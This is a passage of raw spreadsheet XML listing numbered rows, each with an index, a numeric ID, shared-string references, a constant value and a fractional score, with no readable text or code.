        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19497" ht="15.75" customHeight="1">
      <c r="A19497" s="1">
        <v>20215.0</v>
      </c>
      <c r="B19497" s="2">
        <v>1.0729702E7</v>
      </c>
      <c r="C19497" s="2" t="s">
        <v>18791</v>
      </c>
      <c r="D19497" s="2">
        <v>1.0</v>
      </c>
      <c r="E19497" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19497" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19498" ht="15.75" customHeight="1">
      <c r="A19498" s="1">
        <v>20244.0</v>
      </c>
      <c r="B19498" s="2">
        <v>1.0938091E7</v>
      </c>
      <c r="C19498" s="2" t="s">
        <v>18792</v>
      </c>
      <c r="D19498" s="2">
        <v>1.0</v>
      </c>
      <c r="E19498" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19498" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19499" ht="15.75" customHeight="1">
      <c r="A19499" s="1">
        <v>21216.0</v>
      </c>
      <c r="B19499" s="2">
        <v>1.9591235E7</v>
      </c>
      <c r="C19499" s="2" t="s">
        <v>18793</v>
      </c>
      <c r="D19499" s="2">
        <v>1.0</v>
      </c>
      <c r="E19499" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19499" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19500" ht="15.75" customHeight="1">
      <c r="A19500" s="1">
        <v>21668.0</v>
      </c>
      <c r="B19500" s="2">
        <v>2.5015259E7</v>
      </c>
      <c r="C19500" s="2" t="s">
        <v>18794</v>
      </c>
      <c r="D19500" s="2">
        <v>1.0</v>
      </c>
      <c r="E19500" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19500" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19501" ht="15.75" customHeight="1">
      <c r="A19501" s="1">
        <v>21907.0</v>
      </c>
      <c r="B19501" s="2">
        <v>2.8075897E7</v>
      </c>
      <c r="C19501" s="2" t="s">
        <v>18795</v>
      </c>
      <c r="D19501" s="2">
        <v>1.0</v>
      </c>
      <c r="E19501" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19501" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19502" ht="15.75" customHeight="1">
      <c r="A19502" s="1">
        <v>23165.0</v>
      </c>
      <c r="B19502" s="2">
        <v>5.1976532E7</v>
      </c>
      <c r="C19502" s="2" t="s">
        <v>18796</v>
      </c>
      <c r="D19502" s="2">
        <v>1.0</v>
      </c>
      <c r="E19502" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19502" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19503" ht="15.75" customHeight="1">
      <c r="A19503" s="1">
        <v>24109.0</v>
      </c>
      <c r="B19503" s="2">
        <v>9866205.0</v>
      </c>
      <c r="C19503" s="2" t="s">
        <v>18797</v>
      </c>
      <c r="D19503" s="2">
        <v>1.0</v>
      </c>
      <c r="E19503" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19503" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19504" ht="15.75" customHeight="1">
      <c r="A19504" s="1">
        <v>24456.0</v>
      </c>
      <c r="B19504" s="2">
        <v>1.093809E7</v>
      </c>
      <c r="C19504" s="2" t="s">
        <v>18792</v>
      </c>
      <c r="D19504" s="2">
        <v>1.0</v>
      </c>
      <c r="E19504" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19504" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19505" ht="15.75" customHeight="1">
      <c r="A19505" s="1">
        <v>25901.0</v>
      </c>
      <c r="B19505" s="2">
        <v>1.5044442E7</v>
      </c>
      <c r="C19505" s="2" t="s">
        <v>18798</v>
      </c>
      <c r="D19505" s="2">
        <v>1.0</v>
      </c>
      <c r="E19505" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19505" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19506" ht="15.75" customHeight="1">
      <c r="A19506" s="1">
        <v>26846.0</v>
      </c>
      <c r="B19506" s="2">
        <v>1.9009347E7</v>
      </c>
      <c r="C19506" s="2" t="s">
        <v>18799</v>
      </c>
      <c r="D19506" s="2">
        <v>1.0</v>
      </c>
      <c r="E19506" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19506" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19507" ht="15.75" customHeight="1">
      <c r="A19507" s="1">
        <v>27828.0</v>
      </c>
      <c r="B19507" s="2">
        <v>2.3406142E7</v>
      </c>
      <c r="C19507" s="2" t="s">
        <v>18800</v>
      </c>
      <c r="D19507" s="2">
        <v>1.0</v>
      </c>
      <c r="E19507" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19507" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19508" ht="15.75" customHeight="1">
      <c r="A19508" s="1">
        <v>28196.0</v>
      </c>
      <c r="B19508" s="2">
        <v>2.5015258E7</v>
      </c>
      <c r="C19508" s="2" t="s">
        <v>18794</v>
      </c>
      <c r="D19508" s="2">
        <v>1.0</v>
      </c>
      <c r="E19508" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19508" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19509" ht="15.75" customHeight="1">
      <c r="A19509" s="1">
        <v>28409.0</v>
      </c>
      <c r="B19509" s="2">
        <v>2.632899E7</v>
      </c>
      <c r="C19509" s="2" t="s">
        <v>18801</v>
      </c>
      <c r="D19509" s="2">
        <v>1.0</v>
      </c>
      <c r="E19509" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19509" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19510" ht="15.75" customHeight="1">
      <c r="A19510" s="1">
        <v>28738.0</v>
      </c>
      <c r="B19510" s="2">
        <v>2.8047666E7</v>
      </c>
      <c r="C19510" s="2" t="s">
        <v>18802</v>
      </c>
      <c r="D19510" s="2">
        <v>1.0</v>
      </c>
      <c r="E19510" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19510" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19511" ht="15.75" customHeight="1">
      <c r="A19511" s="1">
        <v>28786.0</v>
      </c>
      <c r="B19511" s="2">
        <v>2.8521824E7</v>
      </c>
      <c r="C19511" s="2" t="s">
        <v>18803</v>
      </c>
      <c r="D19511" s="2">
        <v>1.0</v>
      </c>
      <c r="E19511" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19511" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19512" ht="15.75" customHeight="1">
      <c r="A19512" s="1">
        <v>29317.0</v>
      </c>
      <c r="B19512" s="2">
        <v>3.1312423E7</v>
      </c>
      <c r="C19512" s="2" t="s">
        <v>18804</v>
      </c>
      <c r="D19512" s="2">
        <v>1.0</v>
      </c>
      <c r="E19512" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19512" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19513" ht="15.75" customHeight="1">
      <c r="A19513" s="1">
        <v>29688.0</v>
      </c>
      <c r="B19513" s="2">
        <v>3.4125831E7</v>
      </c>
      <c r="C19513" s="2" t="s">
        <v>18805</v>
      </c>
      <c r="D19513" s="2">
        <v>1.0</v>
      </c>
      <c r="E19513" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19513" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19514" ht="15.75" customHeight="1">
      <c r="A19514" s="1">
        <v>29990.0</v>
      </c>
      <c r="B19514" s="2">
        <v>3612078.0</v>
      </c>
      <c r="C19514" s="2" t="s">
        <v>18802</v>
      </c>
      <c r="D19514" s="2">
        <v>1.0</v>
      </c>
      <c r="E19514" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19514" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19515" ht="15.75" customHeight="1">
      <c r="A19515" s="1">
        <v>30701.0</v>
      </c>
      <c r="B19515" s="2">
        <v>4.2615289E7</v>
      </c>
      <c r="C19515" s="2" t="s">
        <v>18806</v>
      </c>
      <c r="D19515" s="2">
        <v>1.0</v>
      </c>
      <c r="E19515" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19515" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19516" ht="15.75" customHeight="1">
      <c r="A19516" s="1">
        <v>34096.0</v>
      </c>
      <c r="B19516" s="2">
        <v>9696819.0</v>
      </c>
      <c r="C19516" s="2" t="s">
        <v>18807</v>
      </c>
      <c r="D19516" s="2">
        <v>1.0</v>
      </c>
      <c r="E19516" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19516" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="19517" ht="15.75" customHeight="1">
      <c r="A19517" s="1">
        <v>8058.0</v>
      </c>
      <c r="B19517" s="2">
        <v>5.2919389E7</v>
      </c>
      <c r="C19517" s="2" t="s">
        <v>18808</v>
      </c>
      <c r="D19517" s="2">
        <v>1.0</v>
      </c>
      <c r="E19517" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19517" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="19518" ht="15.75" customHeight="1">
      <c r="A19518" s="1">
        <v>33419.0</v>
      </c>
      <c r="B19518" s="2">
        <v>7745422.0</v>
      </c>
      <c r="C19518" s="2" t="s">
        <v>18809</v>
      </c>
      <c r="D19518" s="2">
        <v>1.0</v>
      </c>
      <c r="E19518" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19518" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="19519" ht="15.75" customHeight="1">
      <c r="A19519" s="1">
        <v>9547.0</v>
      </c>
      <c r="B19519" s="2">
        <v>5.6027387E7</v>
      </c>
      <c r="C19519" s="2" t="s">
        <v>18810</v>
      </c>
      <c r="D19519" s="2">
        <v>1.0</v>
      </c>
      <c r="E19519" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19519" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="19520" ht="15.75" customHeight="1">
      <c r="A19520" s="1">
        <v>21699.0</v>
      </c>
      <c r="B19520" s="2">
        <v>2.5224221E7</v>
      </c>
      <c r="C19520" s="2" t="s">
        <v>18811</v>
      </c>
      <c r="D19520" s="2">
        <v>1.0</v>
      </c>
      <c r="E19520" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19520" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="19521" ht="15.75" customHeight="1">
      <c r="A19521" s="1">
        <v>22761.0</v>
      </c>
      <c r="B19521" s="2">
        <v>4.4768576E7</v>
      </c>
      <c r="C19521" s="2" t="s">
        <v>18812</v>
      </c>
      <c r="D19521" s="2">
        <v>1.0</v>
      </c>
      <c r="E19521" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19521" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="19522" ht="15.75" customHeight="1">
      <c r="A19522" s="1">
        <v>27328.0</v>
      </c>
      <c r="B19522" s="2">
        <v>2.1412736E7</v>
      </c>
      <c r="C19522" s="2" t="s">
        <v>18813</v>
      </c>
      <c r="D19522" s="2">
        <v>1.0</v>
      </c>
      <c r="E19522" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19522" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="19523" ht="15.75" customHeight="1">
      <c r="A19523" s="1">
        <v>32548.0</v>
      </c>
      <c r="B19523" s="2">
        <v>5751102.0</v>
      </c>
      <c r="C19523" s="2" t="s">
        <v>10379</v>
      </c>
      <c r="D19523" s="2">
        <v>1.0</v>
      </c>
      <c r="E19523" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19523" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="19524" ht="15.75" customHeight="1">
      <c r="A19524" s="1">
        <v>12852.0</v>
      </c>
      <c r="B19524" s="2">
        <v>3.1798764E7</v>
      </c>
      <c r="C19524" s="2" t="s">
        <v>18814</v>
      </c>
      <c r="D19524" s="2">
        <v>1.0</v>
      </c>
      <c r="E19524" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19524" s="2">
        <v>0.0925925925925926</v>
      </c>
    </row>
    <row r="19525" ht="15.75" customHeight="1">
      <c r="A19525" s="1">
        <v>1465.0</v>
      </c>
      <c r="B19525" s="2">
        <v>2.6909777E7</v>
      </c>
      <c r="C19525" s="2" t="s">
        <v>18815</v>
      </c>
      <c r="D19525" s="2">
        <v>1.0</v>
      </c>
      <c r="E19525" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19525" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="19526" ht="15.75" customHeight="1">
      <c r="A19526" s="1">
        <v>7511.0</v>
      </c>
      <c r="B19526" s="2">
        <v>5.1404468E7</v>
      </c>
      <c r="C19526" s="2" t="s">
        <v>18816</v>
      </c>
      <c r="D19526" s="2">
        <v>1.0</v>
      </c>
      <c r="E19526" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19526" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="19527" ht="15.75" customHeight="1">
      <c r="A19527" s="1">
        <v>27407.0</v>
      </c>
      <c r="B19527" s="2">
        <v>2.1803528E7</v>
      </c>
      <c r="C19527" s="2" t="s">
        <v>18817</v>
      </c>
      <c r="D19527" s="2">
        <v>1.0</v>
      </c>
      <c r="E19527" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19527" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="19528" ht="15.75" customHeight="1">
      <c r="A19528" s="1">
        <v>7561.0</v>
      </c>
      <c r="B19528" s="2">
        <v>5.1552328E7</v>
      </c>
      <c r="C19528" s="2" t="s">
        <v>18818</v>
      </c>
      <c r="D19528" s="2">
        <v>1.0</v>
      </c>
      <c r="E19528" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19528" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="19529" ht="15.75" customHeight="1">
      <c r="A19529" s="1">
        <v>10268.0</v>
      </c>
      <c r="B19529" s="2">
        <v>5.7608609E7</v>
      </c>
      <c r="C19529" s="2" t="s">
        <v>18819</v>
      </c>
      <c r="D19529" s="2">
        <v>1.0</v>
      </c>
      <c r="E19529" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19529" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="19530" ht="15.75" customHeight="1">
      <c r="A19530" s="1">
        <v>29306.0</v>
      </c>
      <c r="B19530" s="2">
        <v>3.126403E7</v>
      </c>
      <c r="C19530" s="2" t="s">
        <v>13329</v>
      </c>
      <c r="D19530" s="2">
        <v>1.0</v>
      </c>
      <c r="E19530" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19530" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="19531" ht="15.75" customHeight="1">
      <c r="A19531" s="1">
        <v>880.0</v>
      </c>
      <c r="B19531" s="2">
        <v>2.1946033E7</v>
      </c>
      <c r="C19531" s="2" t="s">
        <v>18820</v>
      </c>
      <c r="D19531" s="2">
        <v>1.0</v>
      </c>
      <c r="E19531" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19531" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="19532" ht="15.75" customHeight="1">
      <c r="A19532" s="1">
        <v>11177.0</v>
      </c>
      <c r="B19532" s="2">
        <v>1.9703856E7</v>
      </c>
      <c r="C19532" s="2" t="s">
        <v>18821</v>
      </c>
      <c r="D19532" s="2">
        <v>1.0</v>
      </c>
      <c r="E19532" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19532" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="19533" ht="15.75" customHeight="1">
      <c r="A19533" s="1">
        <v>18640.0</v>
      </c>
      <c r="B19533" s="2">
        <v>5.3413958E7</v>
      </c>
      <c r="C19533" s="2" t="s">
        <v>18822</v>
      </c>
      <c r="D19533" s="2">
        <v>1.0</v>
      </c>
      <c r="E19533" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19533" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="19534" ht="15.75" customHeight="1">
      <c r="A19534" s="1">
        <v>3303.0</v>
      </c>
      <c r="B19534" s="2">
        <v>3.7585646E7</v>
      </c>
      <c r="C19534" s="2" t="s">
        <v>18823</v>
      </c>
      <c r="D19534" s="2">
        <v>1.0</v>
      </c>
      <c r="E19534" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19534" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="19535" ht="15.75" customHeight="1">
      <c r="A19535" s="1">
        <v>15164.0</v>
      </c>
      <c r="B19535" s="2">
        <v>4.1999996E7</v>
      </c>
      <c r="C19535" s="2" t="s">
        <v>18824</v>
      </c>
      <c r="D19535" s="2">
        <v>1.0</v>
      </c>
      <c r="E19535" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19535" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="19536" ht="15.75" customHeight="1">
      <c r="A19536" s="1">
        <v>17672.0</v>
      </c>
      <c r="B19536" s="2">
        <v>5.048974E7</v>
      </c>
      <c r="C19536" s="2" t="s">
        <v>18825</v>
      </c>
      <c r="D19536" s="2">
        <v>1.0</v>
      </c>
      <c r="E19536" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19536" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="19537" ht="15.75" customHeight="1">
      <c r="A19537" s="1">
        <v>22297.0</v>
      </c>
      <c r="B19537" s="2">
        <v>3.3565877E7</v>
      </c>
      <c r="C19537" s="2" t="s">
        <v>18826</v>
      </c>
      <c r="D19537" s="2">
        <v>1.0</v>
      </c>
      <c r="E19537" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19537" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="19538" ht="15.75" customHeight="1">
      <c r="A19538" s="1">
        <v>25053.0</v>
      </c>
      <c r="B19538" s="2">
        <v>1.2867332E7</v>
      </c>
      <c r="C19538" s="2" t="s">
        <v>18827</v>
      </c>
      <c r="D19538" s="2">
        <v>1.0</v>
      </c>
      <c r="E19538" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19538" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="19539" ht="15.75" customHeight="1">
      <c r="A19539" s="1">
        <v>33474.0</v>
      </c>
      <c r="B19539" s="2">
        <v>7985064.0</v>
      </c>
      <c r="C19539" s="2" t="s">
        <v>18828</v>
      </c>
      <c r="D19539" s="2">
        <v>1.0</v>
      </c>
      <c r="E19539" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19539" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="19540" ht="15.75" customHeight="1">
      <c r="A19540" s="1">
        <v>6000.0</v>
      </c>
      <c r="B19540" s="2">
        <v>4.7459817E7</v>
      </c>
      <c r="C19540" s="2" t="s">
        <v>18829</v>
      </c>
      <c r="D19540" s="2">
        <v>1.0</v>
      </c>
      <c r="E19540" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19540" s="2">
        <v>0.09081196581196578</v>
      </c>
    </row>
    <row r="19541" ht="15.75" customHeight="1">
      <c r="A19541" s="1">
        <v>26661.0</v>
      </c>
      <c r="B19541" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C19541" s="2" t="s">
        <v>18830</v>
      </c>
      <c r="D19541" s="2">
        <v>1.0</v>
      </c>
      <c r="E19541" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19541" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="19542" ht="15.75" customHeight="1">
      <c r="A19542" s="1">
        <v>31399.0</v>
      </c>
      <c r="B19542" s="2">
        <v>4.9992928E7</v>
      </c>
      <c r="C19542" s="2" t="s">
        <v>18831</v>
      </c>
      <c r="D19542" s="2">
        <v>1.0</v>
      </c>
      <c r="E19542" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19542" s="2">
        <v>0.0894538606403013</v>
      </c>
    </row>
    <row r="19543" ht="15.75" customHeight="1">
      <c r="A19543" s="1">
        <v>2398.0</v>
      </c>
      <c r="B19543" s="2">
        <v>3338285.0</v>
      </c>
      <c r="C19543" s="2" t="s">
        <v>18832</v>
      </c>
      <c r="D19543" s="2">
        <v>1.0</v>
      </c>
      <c r="E19543" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19543" s="2">
        <v>0.5686026936026936</v>
      </c>
    </row>
    <row r="19544" ht="15.75" customHeight="1">
      <c r="A19544" s="1">
        <v>4324.0</v>
      </c>
      <c r="B19544" s="2">
        <v>4.2040219E7</v>
      </c>
      <c r="C19544" s="2" t="s">
        <v>18834</v>
      </c>
      <c r="D19544" s="2">
        <v>1.0</v>
      </c>
      <c r="E19544" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19544" s="2">
        <v>0.4702176403207331</v>
      </c>
    </row>
    <row r="19545" ht="15.75" customHeight="1">
      <c r="A19545" s="1">
        <v>29940.0</v>
      </c>
      <c r="B19545" s="2">
        <v>3607484.0</v>
      </c>
      <c r="C19545" s="2" t="s">
        <v>18835</v>
      </c>
      <c r="D19545" s="2">
        <v>1.0</v>
      </c>
      <c r="E19545" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19545" s="2">
        <v>0.4285099052540913</v>
      </c>
    </row>
    <row r="19546" ht="15.75" customHeight="1">
      <c r="A19546" s="1">
        <v>256.0</v>
      </c>
      <c r="B19546" s="2">
        <v>1.5134565E7</v>
      </c>
      <c r="C19546" s="2" t="s">
        <v>18836</v>
      </c>
      <c r="D19546" s="2">
        <v>1.0</v>
      </c>
      <c r="E19546" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19546" s="2">
        <v>0.4084967320261438</v>
      </c>
    </row>
    <row r="19547" ht="15.75" customHeight="1">
      <c r="A19547" s="1">
        <v>6648.0</v>
      </c>
      <c r="B19547" s="2">
        <v>4.9088107E7</v>
      </c>
      <c r="C19547" s="2" t="s">
        <v>18837</v>
      </c>
      <c r="D19547" s="2">
        <v>1.0</v>
      </c>
      <c r="E19547" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19547" s="2">
        <v>0.2375730994152047</v>
      </c>
    </row>
    <row r="19548" ht="15.75" customHeight="1">
      <c r="A19548" s="1">
        <v>9062.0</v>
      </c>
      <c r="B19548" s="2">
        <v>5.5109113E7</v>
      </c>
      <c r="C19548" s="2" t="s">
        <v>18838</v>
      </c>
      <c r="D19548" s="2">
        <v>1.0</v>
      </c>
      <c r="E19548" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19548" s="2">
        <v>0.2236346516007532</v>
      </c>
    </row>
    <row r="19549" ht="15.75" customHeight="1">
      <c r="A19549" s="1">
        <v>9414.0</v>
      </c>
      <c r="B19549" s="2">
        <v>5.5785068E7</v>
      </c>
      <c r="C19549" s="2" t="s">
        <v>18839</v>
      </c>
      <c r="D19549" s="2">
        <v>1.0</v>
      </c>
      <c r="E19549" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19549" s="2">
        <v>0.2230273752012882</v>
      </c>
    </row>
    <row r="19550" ht="15.75" customHeight="1">
      <c r="A19550" s="1">
        <v>2912.0</v>
      </c>
      <c r="B19550" s="2">
        <v>3.5823058E7</v>
      </c>
      <c r="C19550" s="2" t="s">
        <v>18840</v>
      </c>
      <c r="D19550" s="2">
        <v>1.0</v>
      </c>
      <c r="E19550" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19550" s="2">
        <v>0.217948717948718</v>
      </c>
    </row>
    <row r="19551" ht="15.75" customHeight="1">
      <c r="A19551" s="1">
        <v>27536.0</v>
      </c>
      <c r="B19551" s="2">
        <v>2.2211249E7</v>
      </c>
      <c r="C19551" s="2" t="s">
        <v>18841</v>
      </c>
      <c r="D19551" s="2">
        <v>1.0</v>
      </c>
      <c r="E19551" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19551" s="2">
        <v>0.2066395663956639</v>
      </c>
    </row>
    <row r="19552" ht="15.75" customHeight="1">
      <c r="A19552" s="1">
        <v>6454.0</v>
      </c>
      <c r="B19552" s="2">
        <v>4.8610113E7</v>
      </c>
      <c r="C19552" s="2" t="s">
        <v>18842</v>
      </c>
      <c r="D19552" s="2">
        <v>1.0</v>
      </c>
      <c r="E19552" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19552" s="2">
        <v>0.2057291666666667</v>
      </c>
    </row>
    <row r="19553" ht="15.75" customHeight="1">
      <c r="A19553" s="1">
        <v>3729.0</v>
      </c>
      <c r="B19553" s="2">
        <v>3.9632455E7</v>
      </c>
      <c r="C19553" s="2" t="s">
        <v>18843</v>
      </c>
      <c r="D19553" s="2">
        <v>1.0</v>
      </c>
      <c r="E19553" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19553" s="2">
        <v>0.2053140096618358</v>
      </c>
    </row>
    <row r="19554" ht="15.75" customHeight="1">
      <c r="A19554" s="1">
        <v>13258.0</v>
      </c>
      <c r="B19554" s="2">
        <v>3.4310837E7</v>
      </c>
      <c r="C19554" s="2" t="s">
        <v>18844</v>
      </c>
      <c r="D19554" s="2">
        <v>1.0</v>
      </c>
      <c r="E19554" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19554" s="2">
        <v>0.1967592592592593</v>
      </c>
    </row>
    <row r="19555" ht="15.75" customHeight="1">
      <c r="A19555" s="1">
        <v>8372.0</v>
      </c>
      <c r="B19555" s="2">
        <v>5.3810109E7</v>
      </c>
      <c r="C19555" s="2" t="s">
        <v>18845</v>
      </c>
      <c r="D19555" s="2">
        <v>1.0</v>
      </c>
      <c r="E19555" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19555" s="2">
        <v>0.1963601532567049</v>
      </c>
    </row>
    <row r="19556" ht="15.75" customHeight="1">
      <c r="A19556" s="1">
        <v>3486.0</v>
      </c>
      <c r="B19556" s="2">
        <v>3.8415792E7</v>
      </c>
      <c r="C19556" s="2" t="s">
        <v>18846</v>
      </c>
      <c r="D19556" s="2">
        <v>1.0</v>
      </c>
      <c r="E19556" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19556" s="2">
        <v>0.196236559139785</v>
      </c>
    </row>
    <row r="19557" ht="15.75" customHeight="1">
      <c r="A19557" s="1">
        <v>6043.0</v>
      </c>
      <c r="B19557" s="2">
        <v>4.7596612E7</v>
      </c>
      <c r="C19557" s="2" t="s">
        <v>18847</v>
      </c>
      <c r="D19557" s="2">
        <v>1.0</v>
      </c>
      <c r="E19557" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19557" s="2">
        <v>0.1960317460317461</v>
      </c>
    </row>
    <row r="19558" ht="15.75" customHeight="1">
      <c r="A19558" s="1">
        <v>6044.0</v>
      </c>
      <c r="B19558" s="2">
        <v>4.7596612E7</v>
      </c>
      <c r="C19558" s="2" t="s">
        <v>18848</v>
      </c>
      <c r="D19558" s="2">
        <v>1.0</v>
      </c>
      <c r="E19558" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19558" s="2">
        <v>0.1939890710382514</v>
      </c>
    </row>
    <row r="19559" ht="15.75" customHeight="1">
      <c r="A19559" s="1">
        <v>10615.0</v>
      </c>
      <c r="B19559" s="2">
        <v>1.3745882E7</v>
      </c>
      <c r="C19559" s="2" t="s">
        <v>18849</v>
      </c>
      <c r="D19559" s="2">
        <v>1.0</v>
      </c>
      <c r="E19559" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19559" s="2">
        <v>0.1931216931216932</v>
      </c>
    </row>
    <row r="19560" ht="15.75" customHeight="1">
      <c r="A19560" s="1">
        <v>7608.0</v>
      </c>
      <c r="B19560" s="2">
        <v>5.1661616E7</v>
      </c>
      <c r="C19560" s="2" t="s">
        <v>18850</v>
      </c>
      <c r="D19560" s="2">
        <v>1.0</v>
      </c>
      <c r="E19560" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19560" s="2">
        <v>0.192652329749104</v>
      </c>
    </row>
    <row r="19561" ht="15.75" customHeight="1">
      <c r="A19561" s="1">
        <v>7900.0</v>
      </c>
      <c r="B19561" s="2">
        <v>5.2480905E7</v>
      </c>
      <c r="C19561" s="2" t="s">
        <v>18851</v>
      </c>
      <c r="D19561" s="2">
        <v>1.0</v>
      </c>
      <c r="E19561" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19561" s="2">
        <v>0.1906130268199234</v>
      </c>
    </row>
    <row r="19562" ht="15.75" customHeight="1">
      <c r="A19562" s="1">
        <v>9928.0</v>
      </c>
      <c r="B19562" s="2">
        <v>5.6830851E7</v>
      </c>
      <c r="C19562" s="2" t="s">
        <v>18852</v>
      </c>
      <c r="D19562" s="2">
        <v>1.0</v>
      </c>
      <c r="E19562" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19562" s="2">
        <v>0.1885245901639345</v>
      </c>
    </row>
    <row r="19563" ht="15.75" customHeight="1">
      <c r="A19563" s="1">
        <v>11717.0</v>
      </c>
      <c r="B19563" s="2">
        <v>2.374046E7</v>
      </c>
      <c r="C19563" s="2" t="s">
        <v>18853</v>
      </c>
      <c r="D19563" s="2">
        <v>1.0</v>
      </c>
      <c r="E19563" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19563" s="2">
        <v>0.1883680555555556</v>
